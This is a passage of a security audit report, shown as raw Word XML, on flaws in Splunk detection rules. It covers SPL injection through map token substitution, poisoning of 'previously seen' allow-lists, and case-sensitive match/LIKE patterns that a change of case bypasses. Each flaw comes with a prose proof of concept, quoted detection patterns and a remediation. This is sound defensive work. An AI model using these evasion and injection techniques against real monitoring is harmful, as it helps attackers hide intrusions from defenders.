          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Preconditions that bound severity: (1) the inner run executes with the saved-search's own (service) permissions, not elevated beyond the detection; (2) the row only reaches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> if the bogus username also has Shannon entropy &gt; 3, length ≥ 8, a single src, and is followed by a *successful* auth from the same src/dest (lines 18, 30) — a non-trivial precondition, hence AC:H / "Conditionally exploitable"; (3) ES/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> has guardrails but does not quote tokens. The realistic impact is a crafted username injecting SPL that runs in the detection's context (e.g. widening the inner time window, adding a subsearch, or causing errors/DoS of the scheduled search). It is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a path to arbitrary host command execution. Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (self-inflicted SPL injection / detection-logic tampering).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept (safe, local string-substitution model)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: I modelled Splunk's documented </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> substitution as a pure string operation in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scratchpad/work/det/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to show the quote-break. For a failed-auth username value chosen to contain a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> followed by SPL and a trailing comment, the rendered inner search string has its </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eval incorrect_cred="..."</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> literal closed early and the attacker's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| ...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> appended before the detection's own trailing pipes — i.e. the injected clause becomes part of the executed inner SPL. (The outer-search entropy/length/success preconditions above still gate whether such a row ever reaches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t>.) No Splunk instance or external host was contacted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>|s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> quoting modifier on every substituted token so Splunk quote-and-escapes the value, and prefer passing the value as data rather than into a literal:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>| map maxsearches=70 search="</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 tstats `security_content_summariesonly` ... FROM datamodel=Authentication</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WHERE nodename=Authentication.Successful_Authentication</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Authentication.src=$src|s$ Authentication.dest=$dest|s$ sourcetype IN ($sourcetype|s$)</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earliest=$starttime|s$ latest=$endtime|s$ BY \"Authentication.user\"</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 `drop_dm_object_name(\"Authentication\")`</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 `potential_password_in_username_false_positive_reduction`</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 eval incorrect_cred=$incorrect_cred|s$</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 eval ut_shannon=$ut_shannon|s$</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 sort count"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Better still, avoid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> entirely (it is per-row subsearch = expensive and injection-prone) and re-express as a single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>stats</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>eventstats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> join on src+dest. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>$field|s$</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wraps the value in quotes and backslash-escapes embedded quotes, so a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in the username can no longer terminate the literal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component (Injection); CWE-77 Improper Neutralization of Special Elements used in a Command (Command Injection) (2024 CWE Top 25 #13); CWE-116 Improper Encoding or Escaping of Output. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A03:2021 Injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, SI-4 System Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security, DE.CM Detect - Continuous Monitoring. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.28 Secure coding. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / Output Encoding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-04 — Previously-seen baselines and their consumers form an allow-list poisoning path (30 files)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Conditionally exploitable (defence evasion).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> baselines/previously_seen_*___update.yml (13 files); baselines/previously_seen_s3_bucket_access_by_remote_ip.yml; baselines/create_a_list_of_approved_aws_service_accounts.yml:9; detections/endpoint/first_time_seen_running_windows_service.yml:16-17 (18 consumers)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t>: The ESCU "first time seen" pattern maintains KV-store allow-lists (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>previously_seen_running_windows_services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>previously_seen_users_console_logins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>zoom_first_time_child_process</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>previously_seen_cloud_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_service_accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, etc.) via scheduled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>___update</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> baselines that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>append every observed value unconditionally</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>inputlookup append=t ... | outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). The paired detection fires only for values </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>absent</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> from the allow-list. An attacker who controls the monitored field (a Windows service name, a Zoom child-process name, a CloudTrail user/region, an IAM identity) and can get it observed during a quiet window gets it permanently added to "previously seen", after which the real malicious use is suppressed. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>create_a_list_of_approved_aws_service_accounts.yml:9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the starkest case: it writes *every* </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>userName</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>errorCode=success</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> into the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_service_accounts</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> allow-list (consumed by MFA/unapproved-account detections in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>removed/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), so any account that performs one successful call is auto-approved. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>how_to_implement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> even says to manually prune it ("Please remove the entries of service accounts that are not legitimate") — i.e. the design assumes manual curation that the automation defeats. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Source = event fields controllable by an attacker who performs the activity (service install, console login, cloud provisioning). Sink = allow-list read by the detection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where isnull(...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Preconditions: attacker observation lands in a baseline run before the detection run (the baselines run on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Default Baseline</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/hourly cadence). Verdict: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (detection-integrity / defense-evasion; no C or A impact). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Install a service named exactly like a future payload during a maintenance window → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>previously_seen_running_windows_services</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> now contains it → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>first_time_seen_running_windows_service</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> returns </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>firstTimeSeen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-null for the attacker's later identical-named service → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where isnull(firstTimeSeen) OR firstTimeSeen &gt; window</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is false → no alert. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: (1) Gate baseline promotion — exclude sources already flagged (join against risk index / notable throttle) and require a minimum observation count/age before a value is considered "seen"; (2) age out entries; (3) treat the allow-list KV collections as security-sensitive: restrict </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>outputlookup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> write capability to the support-search role only, and set collection ACLs so event-driven searches cannot write them; (4) for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>aws_service_accounts</w:t>
      </w:r>
      <w:r>
        <w:t>, do not auto-populate — seed it from an authoritative IAM inventory, not from observed success events. Example gated update:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>... | stats earliest(_time) as firstTimeSeen ... by service</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 eval observations=1</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 inputlookup previously_seen_running_windows_services append=t</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 stats sum(observations) as observations min(firstTimeSeen) as firstTimeSeen max(lastTimeSeen) as lastTimeSeen by service</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 where observations &gt;= 3 AND (now() - firstTimeSeen) &gt; 86400   ``` require persistence before trusting ```</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 outputlookup previously_seen_running_windows_services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-345 Insufficient Verification of Data Authenticity; CWE-349 Acceptance of Extraneous Untrusted Data With Trusted Data; CWE-807; CWE-693 Protection Mechanism Failure. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A04:2021 Insecure Design, A09:2021 Security Logging and Monitoring Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1562.001 Impair Defenses: Disable or Modify Tools, T1036 Masquerading, T1070 Indicator Removal. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-4 System Monitoring, AU-6 Audit Record Review, Analysis, and Reporting, AU-12 Audit Record Generation, AC-3 Access Enforcement. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DE.CM Detect - Continuous Monitoring, DE.AE Detect - Adverse Event Analysis. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.16 Monitoring activities, A.8.15 Logging, A.8.2 Privileged access rights. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Detection content / Access Control.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DET-06 — Case-sensitive match()/LIKE on attacker-controlled fields allows trivial bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Exploitable (bypass by changing case).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> detections/endpoint/rundll_loading_dll_by_ordinal.yml:27; detections/web/crushftp_authentication_bypass_exploitation.yml:12; detections/endpoint/windows_admin_permission_discovery.yml:12; detections/endpoint/crowdstrike_privilege_escalation_for_non_admin_user.yml:18</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="20" w:after="20"/>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location (≥3)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/endpoint/rundll_loading_dll_by_ordinal.yml:27</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>| where match(process,"rundll32.+\#\d+")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>(?i)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — misses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RUNDLL32</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Rundll32</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/web/crushftp_authentication_bypass_exploitation.yml:12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>match(process,"mesch\.exe") OR match(process,"run")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (case-sensitive, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is an unanchored substring); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/endpoint/windows_admin_permission_discovery.yml:12</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where LIKE(root_drive,"C:")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SPL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is case-sensitive; also hard-codes drive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>C:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Also </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/endpoint/crowdstrike_privilege_escalation_for_non_admin_user.yml:18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIKE(type,"%Privilege escalation%")</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: In SPL, the base search </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Processes.process="*rundll32*"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is case-insensitive, but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>where match()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LIKE()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
